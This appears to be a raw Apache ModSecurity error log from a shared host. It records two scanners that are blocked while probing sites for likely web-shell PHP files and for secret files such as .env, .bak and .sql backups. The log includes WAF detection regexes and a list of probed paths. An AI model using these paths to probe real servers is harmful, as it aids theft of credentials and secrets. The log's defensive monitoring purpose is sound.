[Tue May 26 19:53:14.646431 2026] [security2:error] [pid 86490:tid 86680] [client 74.249.173.207:4182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlbwAAAME"]
[Tue May 26 19:53:14.646512 2026] [security2:error] [pid 86490:tid 86680] [client 74.249.173.207:4182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlbwAAAME"]
[Tue May 26 19:53:14.986325 2026] [security2:error] [pid 86490:tid 86670] [client 74.249.173.207:38946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlewAAALc"]
[Tue May 26 19:53:14.986445 2026] [security2:error] [pid 86490:tid 86670] [client 74.249.173.207:38946] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWs0lZMwN0DpLVWo6KlewAAALc"]
[Tue May 26 19:53:15.122780 2026] [security2:error] [pid 86490:tid 86683] [client 74.249.173.207:4920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/d.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlfwAAAMQ"]
[Tue May 26 19:53:15.122886 2026] [security2:error] [pid 86490:tid 86683] [client 74.249.173.207:4920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/d.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlfwAAAMQ"]
[Tue May 26 19:53:15.290421 2026] [security2:error] [pid 86490:tid 86739] [client 74.249.173.207:4871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xff.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlggAAAPw"]
[Tue May 26 19:53:15.290580 2026] [security2:error] [pid 86490:tid 86739] [client 74.249.173.207:4871] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xff.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlggAAAPw"]
[Tue May 26 19:53:15.318925 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/backup/login.sql"] [unique_id "ahWs01ZMwN0DpLVWo6KlhQAAALw"]
[Tue May 26 19:53:15.486005 2026] [security2:error] [pid 86490:tid 86634] [client 74.249.173.207:4203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xltt.php"] [unique_id "ahWs01ZMwN0DpLVWo6KligAAAJM"]
[Tue May 26 19:53:15.486127 2026] [security2:error] [pid 86490:tid 86634] [client 74.249.173.207:4203] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xltt.php"] [unique_id "ahWs01ZMwN0DpLVWo6KligAAAJM"]
[Tue May 26 19:53:15.606976 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/son.php"] [unique_id "ahWs01ZMwN0DpLVWo6KljgAAANc"]
[Tue May 26 19:53:15.607071 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4215] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/son.php"] [unique_id "ahWs01ZMwN0DpLVWo6KljgAAANc"]
[Tue May 26 19:53:15.657031 2026] [security2:error] [pid 86490:tid 86690] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/db/config.bak"] [unique_id "ahWs01ZMwN0DpLVWo6KlmAAAAMs"]
[Tue May 26 19:53:15.794613 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/doc.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlnwAAAJI"]
[Tue May 26 19:53:15.794752 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4865] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/doc.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlnwAAAJI"]
[Tue May 26 19:53:15.927782 2026] [security2:error] [pid 86490:tid 86651] [client 74.249.173.207:4914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/zo.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlpwAAAKQ"]
[Tue May 26 19:53:15.927895 2026] [security2:error] [pid 86490:tid 86651] [client 74.249.173.207:4914] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/zo.php"] [unique_id "ahWs01ZMwN0DpLVWo6KlpwAAAKQ"]
[Tue May 26 19:53:16.089778 2026] [security2:error] [pid 86490:tid 86713] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs01ZMwN0DpLVWo6KllwAAAOI"]
[Tue May 26 19:53:16.169411 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xper1.php"] [unique_id "ahWs1FZMwN0DpLVWo6KlrgAAAPI"]
[Tue May 26 19:53:16.169550 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4214] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xper1.php"] [unique_id "ahWs1FZMwN0DpLVWo6KlrgAAAPI"]
[Tue May 26 19:53:16.342222 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/tiny.php"] [unique_id "ahWs1FZMwN0DpLVWo6KltQAAAOQ"]
[Tue May 26 19:53:16.342301 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4191] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/tiny.php"] [unique_id "ahWs1FZMwN0DpLVWo6KltQAAAOQ"]
[Tue May 26 19:53:16.502298 2026] [security2:error] [pid 86490:tid 86668] [client 74.249.173.207:38935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/s1.php"] [unique_id "ahWs1FZMwN0DpLVWo6KluQAAALU"]
[Tue May 26 19:53:16.502404 2026] [security2:error] [pid 86490:tid 86668] [client 74.249.173.207:38935] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/s1.php"] [unique_id "ahWs1FZMwN0DpLVWo6KluQAAALU"]
[Tue May 26 19:53:16.506473 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/*.env.live.backup"] [unique_id "ahWs1FZMwN0DpLVWo6KlugAAAJE"]
[Tue May 26 19:53:16.632290 2026] [security2:error] [pid 86490:tid 86688] [client 74.249.173.207:38921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/de.php"] [unique_id "ahWs1FZMwN0DpLVWo6KluwAAAMk"]
[Tue May 26 19:53:16.632370 2026] [security2:error] [pid 86490:tid 86688] [client 74.249.173.207:38921] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/de.php"] [unique_id "ahWs1FZMwN0DpLVWo6KluwAAAMk"]
[Tue May 26 19:53:16.794778 2026] [security2:error] [pid 86490:tid 86700] [client 74.249.173.207:4869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/1a.php"] [unique_id "ahWs1FZMwN0DpLVWo6KlwgAAANU"]
[Tue May 26 19:53:16.794897 2026] [security2:error] [pid 86490:tid 86700] [client 74.249.173.207:4869] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/1a.php"] [unique_id "ahWs1FZMwN0DpLVWo6KlwgAAANU"]
[Tue May 26 19:53:16.846013 2026] [security2:error] [pid 86490:tid 86671] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/smtp.php.bak"] [unique_id "ahWs1FZMwN0DpLVWo6KlwwAAALg"]
[Tue May 26 19:53:16.959363 2026] [security2:error] [pid 86490:tid 86712] [client 74.249.173.207:4184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahWs1FZMwN0DpLVWo6Kl0AAAAOE"]
[Tue May 26 19:53:16.959496 2026] [security2:error] [pid 86490:tid 86712] [client 74.249.173.207:4184] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahWs1FZMwN0DpLVWo6Kl0AAAAOE"]
[Tue May 26 19:53:17.122156 2026] [security2:error] [pid 86490:tid 86665] [client 74.249.173.207:38926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sky.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl1wAAALI"]
[Tue May 26 19:53:17.122285 2026] [security2:error] [pid 86490:tid 86665] [client 74.249.173.207:38926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sky.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl1wAAALI"]
[Tue May 26 19:53:17.361727 2026] [security2:error] [pid 86490:tid 86735] [client 74.249.173.207:4895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/man.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl2gAAAPg"]
[Tue May 26 19:53:17.361808 2026] [security2:error] [pid 86490:tid 86735] [client 74.249.173.207:4895] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/man.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl2gAAAPg"]
[Tue May 26 19:53:17.635894 2026] [security2:error] [pid 86490:tid 86706] [client 74.249.173.207:4875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl4gAAANs"]
[Tue May 26 19:53:17.636010 2026] [security2:error] [pid 86490:tid 86706] [client 74.249.173.207:4875] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl4gAAANs"]
[Tue May 26 19:53:17.695842 2026] [security2:error] [pid 86490:tid 86669] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lms-app/api/.env"] [unique_id "ahWs1VZMwN0DpLVWo6Kl4wAAALY"]
[Tue May 26 19:53:17.818189 2026] [security2:error] [pid 86490:tid 86629] [client 74.249.173.207:4172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl5wAAAI4"]
[Tue May 26 19:53:17.818316 2026] [security2:error] [pid 86490:tid 86629] [client 74.249.173.207:4172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl5wAAAI4"]
[Tue May 26 19:53:17.983793 2026] [security2:error] [pid 86490:tid 86648] [client 74.249.173.207:4545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/pp.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl7wAAAKE"]
[Tue May 26 19:53:17.983919 2026] [security2:error] [pid 86490:tid 86648] [client 74.249.173.207:4545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/pp.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl7wAAAKE"]
[Tue May 26 19:53:18.137782 2026] [security2:error] [pid 86490:tid 86701] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs1VZMwN0DpLVWo6Kl5gAAANY"]
[Tue May 26 19:53:18.204138 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:443/.env"] [unique_id "ahWs1lZMwN0DpLVWo6Kl-AAAANg"]
[Tue May 26 19:53:18.271529 2026] [security2:error] [pid 86490:tid 86642] [client 74.249.173.207:4868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mar.php"] [unique_id "ahWs1lZMwN0DpLVWo6Kl-QAAAJs"]
[Tue May 26 19:53:18.271616 2026] [security2:error] [pid 86490:tid 86642] [client 74.249.173.207:4868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mar.php"] [unique_id "ahWs1lZMwN0DpLVWo6Kl-QAAAJs"]
[Tue May 26 19:53:18.471094 2026] [security2:error] [pid 86490:tid 86656] [client 74.249.173.207:4583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/acp.php"] [unique_id "ahWs1lZMwN0DpLVWo6Kl_gAAAKk"]
[Tue May 26 19:53:18.471197 2026] [security2:error] [pid 86490:tid 86656] [client 74.249.173.207:4583] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/acp.php"] [unique_id "ahWs1lZMwN0DpLVWo6Kl_gAAAKk"]
[Tue May 26 19:53:18.541775 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/telegram-bot/.env"] [unique_id "ahWs1lZMwN0DpLVWo6KmAgAAAQI"]
[Tue May 26 19:53:18.631908 2026] [security2:error] [pid 86490:tid 86682] [client 74.249.173.207:38915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/zdd.php"] [unique_id "ahWs1lZMwN0DpLVWo6KmAwAAAMM"]
[Tue May 26 19:53:18.632024 2026] [security2:error] [pid 86490:tid 86682] [client 74.249.173.207:38915] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/zdd.php"] [unique_id "ahWs1lZMwN0DpLVWo6KmAwAAAMM"]
[Tue May 26 19:53:18.853313 2026] [security2:error] [pid 86490:tid 86711] [client 74.249.173.207:4213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/link.php"] [unique_id "ahWs1lZMwN0DpLVWo6KmBQAAAOA"]
[Tue May 26 19:53:18.853437 2026] [security2:error] [pid 86490:tid 86711] [client 74.249.173.207:4213] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/link.php"] [unique_id "ahWs1lZMwN0DpLVWo6KmBQAAAOA"]
[Tue May 26 19:53:19.028802 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sallu.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmDgAAAOQ"]
[Tue May 26 19:53:19.028888 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4887] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sallu.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmDgAAAOQ"]
[Tue May 26 19:53:19.051057 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/assets/.env.bak"] [unique_id "ahWs11ZMwN0DpLVWo6KmEgAAAJE"]
